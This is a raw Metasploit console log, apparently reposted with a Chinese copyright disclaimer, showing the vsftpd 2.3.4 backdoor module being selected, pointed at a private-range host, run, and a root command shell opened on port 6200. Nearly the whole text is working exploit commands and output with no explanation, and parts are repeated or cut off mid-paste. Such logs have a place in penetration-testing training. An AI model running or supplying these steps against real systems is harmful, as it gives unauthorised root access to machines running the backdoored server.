msfconsole

msfconsole

msf > search vsftpd

[-] Warning: database not connected or cache not built, falling back to slow search

Matching Modules

================

Name                                  Disclosure Date  Rank       Description

----                                  ---------------  ----       -----------

exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  VSFTPD v2.3.4 Backdoor Command Execution

msf >

msf > use exploit/unix/ftp/vsftpd_234_backdoor

msf  exploit(vsftpd_234_backdoor) > show option

[-] Invalid parameter "option", use "show -h" for more information

msf  exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name   Current Setting  Required  Description

----   ---------------  --------  -----------

RHOST                   yes       The target address

RPORT  21               yes       The target port

Exploit target:

Id  Name

--  ----

0   Automatic

msf  exploit(vsftpd_234_backdoor) > info exploit/unix/ftp/vsftpd_234_backdoor

Name: VSFTPD v2.3.4 Backdoor Command Execution

Module: exploit/unix/ftp/vsftpd_234_backdoor

Version: 14976

Platform: Unix

Privileged: Yes

License: Metasploit Framework License (BSD)

Rank: Excellent

Provided by:

hdm

MC

Available targets:

Id  Name

--  ----

0   Automatic

Basic options:

Name   Current Setting  Required  Description

----   ---------------  --------  -----------

RHOST                   yes       The target address

RPORT  21               yes       The target port

Payload information:

Space: 2000

Avoid: 0 characters

Description:

This module exploits a malicious backdoor that was added to the

VSFTPD download archive. This backdoor was introduced into the

vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011

according to the most recent information available. This backdoor

was removed on July 3rd 2011.

References:

 exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name   Current Setting  Required  Description

----   ---------------  --------  -----------

RHOST                   yes       The target address

RPORT  21               yes       The target port

Exploit target:

Id  Name

--  ----

0   Automatic

msf  exploit(vsftpd_234_backdoor) > set RHOST 172.16.24.150

RHOST => 172.16.24.150

msf  exploit(vsftpd_234_backdoor) > check

[*] This exploit does not support check.

msf  exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)

[*] USER: 331 Please specify the password.

[*] Exploit completed, but no session was created.

msf  exploit(vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

Name   Current Setting  Required  Description

----   ---------------  --------  -----------

RHOST  172.16.24.150    yes       The target address

RPORT  21               yes       The target port

Payload options (cmd/unix/interact):

Name  Current Setting  Required  Description

----  ---------------  --------  -----------

Exploit target:

Id  Name

--  ----

0   Automatic

msf  exploit(vsftpd_234_backdoor) > exploit

[*] Banner: 220 (vsFTPd 2.3.4)

[*] USER: 331 Please specify the password.

[+] Backdoor service has been spawned, handling...

[+] UID: uid=0(root) gid=0(root)

[*] Found shell.

[*] Command shell session 1 opened (172.16.24.120:35183 -> 172.16.24.150:6200) at 2013-06-13 22:35:59 +0800

版权声明：本文内容由网络用户投稿，版权归原作者所有，本站不拥有其著作权，亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容，请联系我们jiasou666@gmail.com 处理，核实后本网站将在24小时内删除侵权内容。